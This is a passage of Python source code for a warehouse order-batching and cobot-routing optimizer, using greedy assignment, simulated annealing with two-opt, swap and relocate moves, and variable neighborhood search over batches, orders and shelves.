self.get_items_by_order(new_order)\n                    weight_of_order = self.get_total_weight_by_order(new_order)\n                    new_order = OrderOfBatch(\n                        new_order,\n                        items_of_order,\n                        weight_of_order,\n                        self.item_id_pod_id_dict,\n                        batch.ID,\n                    )\n                    batch.add_order(new_order)\n                    self.greedy_cobot_tour(batch, items=new_order.items)\n                else:\n                    print(\n                        \"but it would add too much weight to the batch, go on to next...\"\n                    )\n                    forbidden_for_batch.append(new_order)\n                print(\n                    \"the current batch ({}) looks as follows: {}\".format(\n                        batch.ID, batch.orders\n                    )\n                )\n            self.batches[batch_id] = batch\n\n    def apply_greedy_heuristic(self):\n        \"\"\"\n        applies the functions defined above to determine a greedy solution to the problem\n        \"\"\"\n        if self.batches:\n            self.batches = dict()\n        for pack_station in self.warehouseInstance.OutputStations.keys():\n            self.assign_orders_to_batches_greedy(pack_station)\n\n\nclass SimulatedAnnealingMixed(GreedyMixedShelves):\n    def __init__(self, input_files):\n        super(SimulatedAnnealingMixed, self).__init__(input_files)\n        self.apply_greedy_heuristic()\n\n    def accept(self, curr_fitness: float, candidate_batch: BatchNew, T):\n        \"\"\"\n        determines whether a candidate solution is to be accepted or not\n        :param curr_fitness: fitness of the batch from the current solution which is to be improved\n        :param candidate_batch: batch from candidate solution\n        :param T: current temperature\n        :return: Accept->bool; improvement->bool\n        \"\"\"\n        candidate_fitness = self.get_fitness_of_tour(\n            candidate_batch.route, candidate_batch.pack_station\n        )\n        if candidate_fitness < curr_fitness:\n            return True, True\n        else:\n            if self.acceptWithProbability(\n                candidate_fitness, curr_fitness, T\n            ):\n                return True, False\n            else:\n                return False, False\n\n    def acceptWithProbability(self, candidateFitness, currentFitness, T):\n        # Accept the new tour for all cases where fitness of candidate => fitness current with a probability\n        return np.random.random() <= np.exp(-abs(candidateFitness - currentFitness) / T)\n\n    def two_opt(self, batch: BatchNew, 
curr_fitness, T):\n        \"\"\"\n        implements the two opt heuristic. The algorithm iterates over every pair of edges of the tour and interchanges\n        them.\n        :param batch: the batch of the neighborhood solution\n        :param curr_fitness: fitness of the current solution which is to be improved\n        :param T: current temperature\n        \"\"\"\n        curr_tour = batch.route[:]\n        curr_tour.insert(0, batch.pack_station)\n        for i in range(len(curr_tour) - 2):\n            for j in range(i + 2, len(curr_tour)):\n                tour = batch.route\n                tour.insert(0, batch.pack_station)\n                tour[i + 1] = tour[j]\n                reverse_order = [curr_tour[m] for m in reversed(range(i + 1, j))]\n                tour[i + 2 : j + 1] = reverse_order\n                tour.remove(batch.pack_station)\n                accept, improve = self.accept(\n                    curr_fitness=curr_fitness, candidate_batch=batch, T=T\n                )\n                if accept:\n                    return accept, improve\n                else:\n                    old_tour = curr_tour[:]\n                    old_tour.remove(batch.pack_station)\n                    batch.route = old_tour\n                    continue\n        return False, False\n\n    def two_opt_randomized(self, batch: BatchNew, curr_fitness, T):\n        \"\"\"\n        randomized version of two-opt in order to speed the local search up. Randomly selects two edges\n        \"\"\"\n        curr_tour = batch.route[:]\n        tour = batch.route\n        length = range(len(tour))\n        i, j = random.sample(length, 2)\n        tour[i], tour[j] = tour[j], tour[i]\n        reverse_order = [tour[m] for m in reversed(range(i + 1, j))]\n        tour[i + 1 : j] = reverse_order\n        accept, improve = self.accept(\n            curr_fitness=curr_fitness, candidate_batch=batch, T=T\n        )\n        if accept:\n            return accept, improve\n        else:\n            batch.route = curr_tour\n            return False, False\n\n    def swap(self, batch: BatchNew, curr_fitness, T):\n        curr_tour = batch.route[:]\n        pairs = list(itertools.combinations(range(len(curr_tour)), 2))\n        pairs = np.random.permutation(pairs)\n        for idx1, idx2 in pairs:\n            # idx1, idx2 = np.random.choice(range(len(curr_tour)), 2, replace=False)\n            batch.route[idx1], batch.route[idx2] = batch.route[idx2], batch.route[idx1]\n            accept, improve = self.accept(\n                curr_fitness=curr_fitness, candidate_batch=batch, T=T\n            )\n            if accept:\n                return accept, improve\n            else:\n                batch.route = curr_tour[:]\n                continue\n        return False, False\n\n    def relocate(self, batch: BatchNew, curr_fitness, T):\n        curr_tour = batch.route[:]\n        for idx1 in range(len(curr_tour)):\n            for idx2 in set(range(len(curr_tour))).difference([1]):\n                batch.route.insert(idx2, batch.route.pop(idx1))\n                accept, improve = self.accept(\n                    curr_fitness=curr_fitness, candidate_batch=batch, T=T\n                )\n                if accept:\n                    return accept, improve\n                else:\n                    batch.route = curr_tour[:]\n                    continue\n        return False, False\n\n    def switch_stations(self, batch: BatchNew):\n        \"\"\"\n        vary the pack station of batches\n        :return:\n        \"\"\"\n        curr_ps = batch.pack_station\n        new_ps = np.random.choice(\n            np.setdiff1d(list(self.warehouseInstance.OutputStations.keys()), curr_ps)\n        )\n        return new_ps\n\n    def get_weight_update(self, accepted, improved, best_fitness):\n        omega1, omega2, omega3, omega4 = 5, 3, 0, 0\n        if self.get_fitness_of_solution() < best_fitness:\n            return omega1\n        elif improved:\n            return omega2\n        elif accepted:\n            return omega3\n        else:\n            return omega4\n\n    def simulatedAnnealing(\n        self,\n        alpha=0.95,\n        maxIteration=1000,\n        minTemperature=0.1,\n        max_it_without_improvement=4,\n        batch: BatchNew = None,\n        lambda_param=0.75,\n        init_weights=1,\n    ):\n        \"\"\"\n        implements a simulated annealing to optimize the tour of a given batch or all batches at once. 
Neighborhood\n        solutions are generated using two opt, either randomized or full.\n        :param alpha: cooling parameter\n        :param maxIteration: maximum iterations\n        :param minTemperature: temperature at which to terminate the algorithm if reached\n        :param max_it_without_improvement: maximum number of iterations allowed without changes in the solution\n        :param batch: if only a single batch shall be optimized, specify it here\n        :param lambda_param: weight for previous operator weight in update step\n        :param init_weights: initial weights of all operators\n        \"\"\"\n\n        batches = self.batches.values() if not batch else [batch]\n        operations = [self.two_opt, self.swap, self.relocate]\n\n        weights = [init_weights] * len(operations)\n\n        for batch in batches:\n\n            best_batch = copy.deepcopy(batch)\n            best_fit = self.get_fitness_of_batch(best_batch)\n            curr_fit = self.get_fitness_of_batch(batch)\n\n            iteration = 0\n            it_without_improvement = 0\n\n            T = max(self.distance_ij.values()) - min(list(self.distance_ij.values()))\n            while (\n                T >= minTemperature\n                and iteration < maxIteration\n                and it_without_improvement < max_it_without_improvement\n            ):\n                probs = [x / sum(weights) for x in weights]\n                operation = np.random.choice(operations, p=probs)\n                if len(batch.route) > 2:\n                    # improved = self.two_opt_randomized(batch, curr_sol, T)\n                    accepted, improved = operation(batch, curr_fit, T)\n                    weight_update = self.get_weight_update(accepted, improved, best_fit)\n                    weights[operations.index(operation)] = (\n                        lambda_param * weights[operations.index(operation)]\n                        + (1 - lambda_param) * weight_update\n                    )\n                    if accepted:\n                        curr_fit = self.get_fitness_of_batch(batch)\n                        if curr_fit < best_fit:\n                            best_fit = curr_fit\n                            best_batch = copy.deepcopy(batch)\n                    it_without_improvement += 1 if not improved else 0\n                    T *= alpha\n                    iteration += 1\n                else:\n                    T = 0  # route cannot be optimized as it consists of only one point\n            batch.__dict__ = best_batch.__dict__.copy()\n\n\nclass VariableNeighborhoodSearch(SimulatedAnnealingMixed):\n    @staticmethod\n    def kk(\n        number_list,\n    ):  # Karmarkar-Karp heuristic, adopted and adapted from partition package\n        pairs = LifoQueue()\n        group1, group2 = [], []\n        heap = [(-1 * i.weight, i.ID) for i in number_list]\n        heapq.heapify(heap)\n        while len(heap) > 1:\n            i, labeli = heapq.heappop(heap)\n            j, labelj = heapq.heappop(heap)\n            pairs.put((labeli, labelj))\n            heapq.heappush(heap, (i - j, labeli))\n        group1.append(heapq.heappop(heap)[1])\n\n        while not pairs.empty():\n            pair = pairs.get()\n            if pair[0] in group1:\n                group2.append(pair[1])\n            elif pair[0] in group2:\n                group1.append(pair[1])\n        return group1, group2\n\n    def __init__(self, input_files):\n        super(VariableNeighborhoodSearch, self).__init__(input_files)\n        self.simulatedAnnealing()  # get initial solution\n\n    def update_batches_from_new_order(self, new_order, batch_id):\n        \"\"\"\n        does all the necessary updating when an order is added to a batch. 
This includes optimizing the tour through\n greedy and simulated annealing heuristics\n :param new_order:\n :param batch_id:\n :return:\n \"\"\"\n update_batch = self.batches[batch_id]\n items_of_order = self.get_items_by_order(new_order)\n weight_of_order = self.get_total_weight_by_order(new_order)\n new_order = OrderOfBatch(\n new_order,\n items_of_order,\n weight_of_order,\n self.item_id_pod_id_dict,\n update_batch.ID,\n )\n update_batch.add_order(new_order)\n self.greedy_cobot_tour(update_batch, new_order.items)\n # self.simulatedAnnealing(batch=self.batches[batch_id]) # takes too much time --> perform only at the end\n\n def shake(self, k):\n batches_to_destroy = k if k <= len(self.batches) else len(self.batches)\n print(f\"Performing perturbation with k={k}\")\n orders = {}\n for i in range(batches_to_destroy):\n destroy_batch = self.choose_batch_for_destruction()\n orders = {**orders, **self.batches[destroy_batch].orders}\n self.replenish_shelves(self.batches[destroy_batch])\n self.batches.pop(destroy_batch)\n\n weight_dict = self.get_weight_per_batch()\n # sort orders with respect to their weight in descending order (try to assign the biggest orders first)\n weight_of_orders = {\n key: v.weight\n for key, v in sorted(\n orders.items(), key=lambda item: item[1].weight, reverse=True\n )\n }\n for order, weight_of_order in weight_of_orders.items():\n candidate_batches = {}\n for key, weight in weight_dict.items():\n if weight_of_order + weight <= self.batch_weight:\n candidate_batches[key] = weight_of_order + weight\n if not candidate_batches:\n pack_station = self.do_station_assignment(order)\n batch_id = str(self.get_new_batch_id())\n self.batches[batch_id] = BatchNew(\n batch_id, pack_station, self.station_id_bot_id_dict[pack_station]\n )\n self.update_batches_from_new_order(order, batch_id)\n else:\n # choose the batch with maximum workload after assignment\n new_batch_of_order = np.random.choice(list(candidate_batches.keys()))\n # new_batch_of_order = max(candidate_batches.keys(), key=(lambda k: candidate_batches[k]))\n self.update_batches_from_new_order(\n new_order=order, batch_id=new_batch_of_order\n )\n # update weight_dict\n weight_dict = self.get_weight_per_batch()\n self.align_station_utilization()\n print(\"fitness after perturbation: \", self.get_fitness_of_solution())\n\n def align_station_utilization(self):\n \"\"\"function to change the pack station assigned to batches as long as the\n utilization at the pack stations is aligned\n \"\"\"\n while any([\n abs(len(self.get_batches_for_station(ps1)) - len(self.get_batches_for_station(ps2))) >= 2\n for ps1, ps2 in list(itertools.combinations(self.warehouseInstance.OutputStations.keys(), 2))\n ]):\n self.swap_ps_of_batch()\n\n def exchange_orders(self, k, processed):\n card = k\n\n all_orders = {\n order.ID: order for batch in self.batches.values() for order in list(batch.orders.values())\n }\n\n combs = list(itertools.combinations(\n [order.ID for order in all_orders.values()], 2\n ))\n combs_feas = []\n for comb in combs:\n order_i, order_j = itemgetter(*comb)(all_orders)\n # exclude combinations that come from same batch -> exchanging orders within a batch makes no sense\n if order_i.batch_id == order_j.batch_id:\n continue\n # check weight constraints\n weight_diff = order_i.weight - order_j.weight\n if (\n weight_diff <= 0 and abs(weight_diff) <= self.batch_weight - self.batches[order_i.batch_id].weight\n ) or (weight_diff > 0 and weight_diff <= self.batch_weight - self.batches[order_j.batch_id].weight):\n 
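# keep only pairs whose exchange respects the maximum batch weight\n                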
combs_feas.append(comb)\n\n count = 0\n while count < card:\n # refresh so the order objects are bound to the one assigned to the batches (weird behavior in python)\n all_orders = {\n order.ID: order for batch in self.batches.values() for order in list(batch.orders.values())\n }\n\n combs = list(set(combs).difference(processed))\n if len(combs) == 0:\n return processed\n\n order_weights = {\n order.ID: sum(\n [\n (\n len(self.batches[order.batch_id].items_of_shelves[key]) -\n order.chosen_shelves.get(key, 0)\n ) == 0\n for key in self.batches[order.batch_id].items_of_shelves.keys()\n ]\n )\n for order in all_orders.values()\n }\n\n comb_weights = [sum(itemgetter(*combs[i])(order_weights)) for i in range(len(combs))]\n\n if sum(comb_weights) == 0:\n probs = [1 / len(combs)] * len(combs)\n else:\n probs = np.array(comb_weights) / sum(comb_weights)\n\n orders = combs.pop(np.random.choice(range(len(combs)), p=probs))\n order_i, order_j = itemgetter(*orders)(all_orders)\n\n # somehow have to do that, otherwise objects diverge leading to complex problems\n order_i = self.batches[order_i.batch_id].orders[order_i.ID]\n order_j = self.batches[order_j.batch_id].orders[order_j.ID]\n\n # through exchange in previous iterations, this case could occur\n if order_i.batch_id == order_j.batch_id:\n continue\n # do not make the same operation twice\n processed.append(orders)\n # get batches of orders\n batch_i = self.batches[order_i.batch_id]\n batch_j = self.batches[order_j.batch_id]\n # has been checked, but through previous iterations could have changed\n weight_diff = order_i.weight - order_j.weight\n if (\n weight_diff <= 0 and abs(weight_diff) <= self.batch_weight - batch_i.weight\n ) or (weight_diff > 0 and weight_diff <= self.batch_weight - batch_j.weight):\n count += 1\n\n batch_i.del_order(order_i, self.item_id_pod_id_dict)\n batch_j.add_order(order_i)\n self.greedy_cobot_tour(batch_j, items=order_i.items)\n\n batch_j.del_order(order_j, self.item_id_pod_id_dict)\n batch_i.add_order(order_j)\n self.greedy_cobot_tour(batch_i, items=order_j.items)\n\n if len(batch_i.items) == 0:\n self.batches.pop(batch_i.ID)\n batch_i = None\n if len(batch_j.items) == 0:\n self.batches.pop(batch_j.ID)\n batch_j = None\n self.align_station_utilization()\n if batch_i: self.local_search_shelves(batch_i)\n if batch_j: self.local_search_shelves(batch_j)\n return processed\n\n def determine_switchable_orders_randomized(self, k, processed):\n \"\"\"given two batches (batch ids), this function determines one order of each batch which can be\n exchanged between the batches (wrt to capacity restrictions).\n \"\"\"\n batch_i, batch_j = np.random.choice(\n [batch for key, batch in self.batches.items()], 2, replace=False\n )\n\n batch_i_orders = list(batch_i.orders.values())\n batch_j_order = list(batch_j.orders.values())\n\n card = min(k, len(batch_i_orders) + len(batch_j_order))\n\n combs = itertools.combinations(\n [order.ID for order in batch_i_orders + batch_j_order], card\n )\n combs = list(set(combs).difference(processed))\n if len(combs) == 0:\n return processed\n\n batch_i_orders_weights = {\n order.ID: sum(\n [\n (len(batch_i.items_of_shelves[key]) - order.chosen_shelves.get(key, 0)) == 0\n for key in batch_i.items_of_shelves.keys()\n ]\n )\n for order in batch_i_orders\n }\n\n batch_j_orders_weights = {\n order.ID: sum(\n [\n (\n len(batch_j.items_of_shelves[key])\n - order.chosen_shelves.get(key, 0)\n )\n == 0\n for key in batch_j.items_of_shelves.keys()\n ]\n )\n for order in batch_j_order\n }\n order_weights = 
{**batch_i_orders_weights, **batch_j_orders_weights}\n\n comb_weights = [sum([order_weights[order] for order in comb]) for comb in combs]\n if sum(comb_weights) == 0:\n probs = [1 / len(combs)] * len(combs)\n else:\n probs = np.array(comb_weights) / sum(comb_weights)\n orders = combs[np.random.choice(range(len(combs)), p=probs)]\n\n orders_i = [\n batch_i.orders[order]\n for order in set(batch_i.orders.keys()).intersection(orders)\n ]\n orders_j = [\n batch_j.orders[order]\n for order in set(batch_j.orders.keys()).intersection(orders)\n ]\n\n processed.append(orders)\n\n orders_i_weight = sum([order_i.weight for order_i in orders_i])\n orders_j_weight = sum([order_j.weight for order_j in orders_j])\n\n weight_diff = orders_i_weight - orders_j_weight\n\n if (\n weight_diff <= 0 and abs(weight_diff) <= self.batch_weight - batch_i.weight\n ) or (weight_diff > 0 and weight_diff <= self.batch_weight - batch_j.weight):\n for order_i in orders_i:\n batch_i.del_order(order_i, self.item_id_pod_id_dict)\n batch_j.add_order(order_i)\n self.greedy_cobot_tour(batch_j, items=order_i.items)\n for order_j in orders_j:\n batch_j.del_order(order_j, self.item_id_pod_id_dict)\n batch_i.add_order(order_j)\n self.greedy_cobot_tour(batch_i, items=order_j.items)\n if len(batch_i.items) == 0:\n self.batches.pop(batch_i.ID)\n batch_i = None\n if len(batch_j.items) == 0:\n self.batches.pop(batch_j.ID)\n batch_j = None\n self.align_station_utilization()\n if batch_i: self.local_search_shelves(batch_i)\n if batch_j: self.local_search_shelves(batch_j)\n return processed\n\n def swap_ps_of_batch(self):\n batches_per_ps = {\n ps: len(self.get_batches_for_station(ps)) for ps in self.warehouseInstance.OutputStations.keys()\n }\n ps = max(batches_per_ps, key=batches_per_ps.get)\n # savings_per_batch = {\n # key: sum(\n # [max(self.get_station_with_min_total_distance(order.ID).values())\n # for order in batch.orders.values()]\n # )\n # for key, batch in self.batches.items()\n # if batch.pack_station == ps\n # }\n # batch = min(savings_per_batch, key=savings_per_batch.get)\n # does this makes sense?\n # transformed = max(list(savings_per_batch.values()))-np.array(list(savings_per_batch.values()))\n # probs = transformed / sum(transformed)\n batch = np.random.choice(\n [batch.ID for batch in self.batches.values() if batch.pack_station == ps]\n )\n self.batches[batch].pack_station = str(\n np.random.choice(\n np.setdiff1d(\n list(self.warehouseInstance.OutputStations.keys()),\n [self.batches[batch].pack_station],\n )\n )\n )\n self.simulatedAnnealing(batch=self.batches[batch])\n\n def swap_order(self, k, processed):\n all_orders = [\n order for batch in self.batches.values() for order in batch.orders.values()\n ]\n all_order_feas = []\n for order in all_orders:\n if any([(self.batch_weight - batch.weight + order.weight) >= 0 for batch in self.batches.values()]):\n all_order_feas.append(order)\n\n frac_nodes_to_remove = {\n order: sum([\n (num_items_per_shelf - order.shelves.get(key, 0)) == 0\n for key, num_items_per_shelf in {\n key: len(x)\n for key, x in self.batches[order.batch_id].items_of_shelves.items()\n }.items()\n ]) / len(order.items)\n for order in all_order_feas\n }\n count = 0\n\n if all(np.array(list(frac_nodes_to_remove.values()))==0):\n probs = np.array([1/len(frac_nodes_to_remove)]*len(frac_nodes_to_remove))\n else:\n probs = np.array(list(frac_nodes_to_remove.values()))/sum(frac_nodes_to_remove.values())\n\n orders = np.random.choice(list(frac_nodes_to_remove.keys()), p=probs, size=min(k, len([x for x in probs 
if x > 0])), replace=False)\n assert all([order is self.batches[order.batch_id].orders[order.ID] for order in all_orders])\n for order in orders:\n # no clue why, but this has to be done, otherwise order becomes new object which causes all kinds of problems\n order = self.batches[order.batch_id].orders[order.ID]\n batch_to_remove_from = self.batches[order.batch_id]\n\n interactions = {\n batch: sum([\n any(set(item.shelves) & set(batch.route))\n for item in order.items.values()\n ]) for batch in self.batches.values()\n if batch.ID != order.batch_id and (self.batch_weight - (batch.weight + order.weight)) >= 0\n }\n if len(interactions)==0:\n continue\n if all(np.array(list(interactions.values())) == 0):\n probs = [1/len(interactions)] * len(interactions)\n else:\n probs = np.array(list(interactions.values()))/sum(interactions.values())\n\n batch_to_add_to = np.random.choice(list(interactions.keys()), p=probs)\n\n if order.weight < self.batch_weight - batch_to_add_to.weight:\n count += 1\n batch_to_remove_from.del_order(order, self.item_id_pod_id_dict)\n if len(batch_to_remove_from.items) == 0:\n self.batches.pop(batch_to_remove_from.ID)\n batch_to_remove_from.route = [\n x\n for x in batch_to_remove_from.route\n if x in list(batch_to_remove_from.items_of_shelves.keys())\n ]\n\n batch_to_add_to.add_order(order)\n self.greedy_cobot_tour(batch_to_add_to, items=order.items)\n self.align_station_utilization()\n self.local_search_shelves(batch_to_add_to)\n\n return processed\n\n def randomized_local_search(self, max_iters=10, k=1, lamb=0.7, alpha=0.9):\n \"\"\"\n perform simple randomized swap of orders to batches. This is done for a given number of iterations on\n randomly drawn orders.\n Neighborhood solution is accepted if it results in a better fitness value\n :return:\n \"\"\"\n print(\"local with k=\", k)\n iters = 0\n curr_fit = self.get_fitness_of_solution()\n curr_sol = copy.deepcopy(self.batches)\n best_fit = curr_fit\n best_sol = copy.deepcopy(self.batches)\n item_id_pod_id_dict_copy = copy.deepcopy(self.item_id_pod_id_dict)\n processed = []\n operators = [self.swap_order, self.exchange_orders, self.determine_switchable_orders_randomized]\n weights = [1] * len(operators)\n T = 0.02 * curr_fit\n while iters < max_iters:\n operator_idx = np.random.choice(np.arange(0, len(operators)), p=np.array(weights)/sum(weights))\n operator = operators[operator_idx]\n processed = operator(k, processed)\n new_fit = self.get_fitness_of_solution()\n if self.get_fitness_of_solution() < curr_fit:\n curr_sol = copy.deepcopy(self.batches)\n curr_fit = self.get_fitness_of_solution()\n item_id_pod_id_dict_copy = copy.deepcopy(self.item_id_pod_id_dict)\n processed = []\n if curr_fit < best_fit:\n best_sol = copy.deepcopy(self.batches)\n best_fit = curr_fit\n weights[operator_idx] = lamb * weights[operator_idx] + (1-lamb) * 5\n else:\n weights[operator_idx] = lamb * weights[operator_idx] + (1-lamb) * 3\n elif self.acceptWithProbability(new_fit, curr_fit, T):\n curr_sol = copy.deepcopy(self.batches)\n curr_fit = self.get_fitness_of_solution()\n item_id_pod_id_dict_copy = copy.deepcopy(self.item_id_pod_id_dict)\n processed = []\n weights[operator_idx] = lamb * weights[operator_idx] + (1-lamb) * 1\n else:\n self.batches = copy.deepcopy(curr_sol)\n self.item_id_pod_id_dict = copy.deepcopy(item_id_pod_id_dict_copy)\n weights[operator_idx] = lamb * weights[operator_idx] + (1-lamb) * 1\n iters += 1\n T *= alpha\n # set to best solution\n\n for batch in self.batches.values():\n batch.__dict__ = 
best_sol[batch.ID].__dict__.copy()\n assert batch is self.batches[batch.ID]\n self.item_id_pod_id_dict = copy.deepcopy(self.item_id_pod_id_dict_orig)\n for batch in self.batches.values():\n for item in batch.items.values():\n self.item_id_pod_id_dict[item.orig_ID][item.shelf] -= 1\n\n def repair_negative_stock(self):\n class FindSlack:\n def __init__(self, slack, new_batch, item, shelf, item_id_pod_it_dict):\n self.slack = slack\n self.new_batch = new_batch\n self.item = item\n self.shelf = shelf\n self.item_id_pod_id_dict_c = item_id_pod_it_dict\n\n while True:\n blacklist = []\n for ik, item in self.item_id_pod_id_dict.items():\n for sk, shelf in item.items():\n if shelf < 0:\n blacklist.append((ik, sk))\n if len(blacklist) == 0:\n return\n for item_key, shelf_key in blacklist:\n slacks = []\n for bid, batch in self.batches.items():\n if item_key in [item.orig_ID for item in batch.items_of_shelves.get(shelf_key, [])]:\n prev_fitness = self.get_fitness_of_batch(batch)\n\n curr_batch = copy.deepcopy(batch)\n item_id_pod_it_dict_copy = copy.deepcopy(self.item_id_pod_id_dict)\n\n self.local_search_shelves(batch, item_key, shelf_key)\n slacks.append(FindSlack(\n self.get_fitness_of_batch(batch)-prev_fitness,\n copy.deepcopy(batch),\n item_key,\n shelf_key,\n copy.deepcopy(self.item_id_pod_id_dict)\n ))\n\n batch.__dict__ = curr_batch.__dict__.copy()\n self.item_id_pod_id_dict = item_id_pod_it_dict_copy\n min_slack = min(slacks, key=attrgetter(\"slack\"))\n self.batches[min_slack.new_batch.ID].__dict__ = min_slack.new_batch.__dict__.copy()\n self.item_id_pod_id_dict = min_slack.item_id_pod_id_dict_c\n\n\n def local_search_shelves(self, batch: BatchNew, blacklist_item=None, blacklist_shelf=None):\n curr_batch = copy.deepcopy(batch)\n item_id_pod_it_dict_copy = copy.deepcopy(self.item_id_pod_id_dict)\n if not self.is_storage_dedicated:\n\n batch.route = []\n self.replenish_shelves(batch)\n assigned = []\n while len(assigned) != len(batch.items):\n to_be_assigned = [\n item\n for item in batch.items.values()\n if item.ID not in [i.ID for i in assigned]\n ]\n shelves = [\n shelf\n for item in to_be_assigned\n for shelf in item.shelves\n if shelf not in batch.route\n and not (item.orig_ID == blacklist_item and shelf == blacklist_shelf)\n # and self.item_id_pod_id_dict[item.orig_ID][shelf] > 0\n ]\n shelf_counts = Counter(shelves)\n\n for a, b in itertools.combinations(shelf_counts, 2):\n if self.distance_ij[a, b] <= 0:\n shelf_counts[a], shelf_counts[b] = (\n shelf_counts[a] + shelf_counts[b],\n ) * 2\n # with 50 percent prob use the random draw method\n if np.random.random() < 1:\n # softmax probability\n sum_counts = sum([np.exp(count) for count in shelf_counts.values()])\n probs_shelves = {\n shelf: np.exp(count) / sum_counts\n for shelf, count in shelf_counts.items()\n }\n\n dists = {\n shelf: min(\n [\n self.distance_ij[node, shelf]\n for node in batch.route + [batch.pack_station]\n ]\n )\n for shelf in shelves\n }\n max_dist = max(dists.values())\n diff_dist = {\n shelf: max_dist - dist for shelf, dist in dists.items()\n }\n sum_diff_dist = sum(diff_dist.values())\n if sum_diff_dist == 0:\n probs_dist = {\n shelf: 1 / len(diff_dist) for shelf in diff_dist.keys()\n }\n else:\n probs_dist = {\n shelf: dist / sum_diff_dist\n for shelf, dist in diff_dist.items()\n }\n probs = {\n key: (probs_shelves[key] + probs_dist[key]) / 2\n for key in probs_shelves.keys()\n }\n\n top_shelf = np.random.choice(\n list(probs.keys()), p=list(probs.values())\n )\n # with 50 percent prob use the rank method\n 
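# NOTE: np.random.random() < 1 above is always true, so this rank-based\n            # draw below is effectively disabled at the moment\n            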
else:\n rank = (\n pd.DataFrame.from_dict(\n shelf_counts, orient=\"index\", columns=[\"num_shelves\"]\n )\n .rank(method=\"min\", ascending=False)\n .merge(\n pd.DataFrame.from_dict(\n {\n shelf: min(\n [\n self.distance_ij[node, shelf]\n for node in batch.route\n + [batch.pack_station]\n ]\n )\n for shelf in shelves\n },\n orient=\"index\",\n columns=[\"distance\"],\n ).rank(method=\"min\", ascending=True),\n left_index=True,\n right_index=True,\n )\n )\n # random weights for randomization of shelf picks\n weight_1 = np.random.random()\n weight_2 = 1 - weight_1\n top_shelf = rank.apply(\n lambda x: np.average(x, weights=[weight_1, weight_2]), axis=1\n ).idxmin()\n\n items_in_top_shelf = [\n item for item in to_be_assigned if top_shelf in item.shelves and not (\n item.orig_ID == blacklist_item and top_shelf == blacklist_shelf\n )\n ]\n for item in items_in_top_shelf:\n # if self.item_id_pod_id_dict[item.orig_ID][top_shelf] > -10000:\n item.shelf = top_shelf\n self.item_id_pod_id_dict[item.orig_ID][top_shelf] -= 1\n assigned.append(item)\n batch.route.append(top_shelf)\n # batch_eh, batch_eh_copy = self.swap_ps(batch)\n batch_eh, batch_eh_copy = None, None\n if not blacklist_item: # dont call the function within recursion\n self.repair_negative_stock()\n # self.swap_ps(batch)\n self.simulatedAnnealing(batch=batch)\n if not self.get_fitness_of_batch(batch) < self.get_fitness_of_batch(curr_batch) and not blacklist_item: # dont revert solution in case we check blacklist impact\n batch.__dict__ = curr_batch.__dict__.copy()\n if batch_eh: batch_eh.__dict__ = batch_eh_copy.__dict__.copy()\n self.item_id_pod_id_dict = item_id_pod_it_dict_copy\n\n def swap_ps(self, batch_i):\n curr_fit = self.get_fitness_of_solution()\n for batch_j in [\n batch\n for batch in self.batches.values()\n if batch.pack_station != batch_i.pack_station\n ]:\n batch_i_copy = copy.deepcopy(batch_i)\n batch_j_copy = copy.deepcopy(batch_j)\n batch_i.pack_station = batch_j.pack_station\n batch_j.pack_station = batch_i.pack_station\n self.simulatedAnnealing(batch=batch_i)\n self.simulatedAnnealing(batch=batch_j)\n # self.tests()\n if self.get_fitness_of_solution() < curr_fit:\n return batch_j, batch_j_copy\n else:\n batch_i.__dict__ = batch_i_copy.__dict__.copy()\n batch_j.__dict__ = batch_j_copy.__dict__.copy()\n return None, None\n\n def reduce_number_of_batches(self, max_tries=3):\n tries = 0\n imp = False\n if not np.ceil(\n sum(\n [\n self.get_total_weight_by_order(order)\n for order in self.warehouseInstance.Orders.keys()\n ]\n )\n / 18\n ) < len(self.batches):\n print(\"Number of Batches at optimum\")\n else:\n processed = []\n while (\n np.ceil(\n sum(\n [\n self.get_total_weight_by_order(order)\n for order in self.warehouseInstance.Orders.keys()\n ]\n )\n / 18\n )\n < len(self.batches)\n and tries < max_tries\n ):\n\n reduced, destroy_batch = self.optimized_perturbation(already_destroyed=processed)\n processed.append(destroy_batch)\n if not reduced:\n # self.shake(1)\n tries += 1\n return imp\n\n def choose_batch_for_destruction(self, with_prob=False, already_destroyed=[]):\n num_batches_per_station = {\n pack_station: len(self.get_batches_for_station(pack_station))\n for pack_station in self.warehouseInstance.OutputStations\n }\n if any(\n [\n np.abs(v_1 - v_2) > 0\n for k_1, v_1 in num_batches_per_station.items()\n for k_2, v_2 in num_batches_per_station.items()\n if not k_1 == k_2\n ]\n ):\n ps_to_destroy_from = max(\n num_batches_per_station.keys(),\n key=(lambda k: num_batches_per_station[k]),\n )\n weight_dict = 
self.get_weight_per_batch(ps_to_destroy_from)\n else:\n weight_dict = self.get_weight_per_batch()\n if with_prob and len(weight_dict.values()) > 1:\n transformations = {key: max(weight_dict.values())-weight for key, weight in weight_dict.items()}\n probabilities = {key: trans/sum(transformations.values()) for key, trans in transformations.items()}\n destroy_batch = np.random.choice(list(probabilities.keys()), p=list(probabilities.values()))\n else:\n destroy_batch = np.random.choice(list(weight_dict.keys()))\n return destroy_batch\n\n def optimized_perturbation(self, already_destroyed=[]):\n print(\"try to minimize the number of batches\")\n destroy_batch = None\n improvement = True\n change = False\n curr_sol = copy.deepcopy(self.batches)\n item_id_pod_id_dict_copy = copy.deepcopy(self.item_id_pod_id_dict)\n while improvement and np.ceil(\n sum(\n [\n self.get_total_weight_by_order(order)\n for order in self.warehouseInstance.Orders.keys()\n ]\n )\n / 18\n ) < len(self.batches):\n change = True\n destroy_batch = self.choose_batch_for_destruction(\n with_prob=False, already_destroyed=already_destroyed\n )\n orders_to_reassign = self.batches[destroy_batch].orders\n self.replenish_shelves(self.batches[destroy_batch])\n self.batches.pop(destroy_batch)\n # sort orders with respect to their weight in descending order (try to assign the biggest orders first)\n weight_of_orders = {\n k: v\n for k, v in sorted(\n orders_to_reassign.items(),\n key=lambda item: item[1].weight,\n reverse=True,\n )\n }\n # reassign all orders\n for order in weight_of_orders.values():\n candidate_batches = {}\n for key, batch in self.batches.items():\n candidate_batches[key] = order.weight + batch.weight\n if not candidate_batches:\n pass\n else:\n new_batch_of_item = min(\n candidate_batches.keys(), key=(lambda k: candidate_batches[k])\n )\n self.update_batches_from_new_order(\n new_order=order.ID, batch_id=new_batch_of_item\n )\n if all(\n [batch.weight <= self.batch_weight for batch in self.batches.values()]\n ):\n improvement = True\n else:\n improvement = self.repair()\n if improvement:\n print(\n f\"found solution with one batch less. 
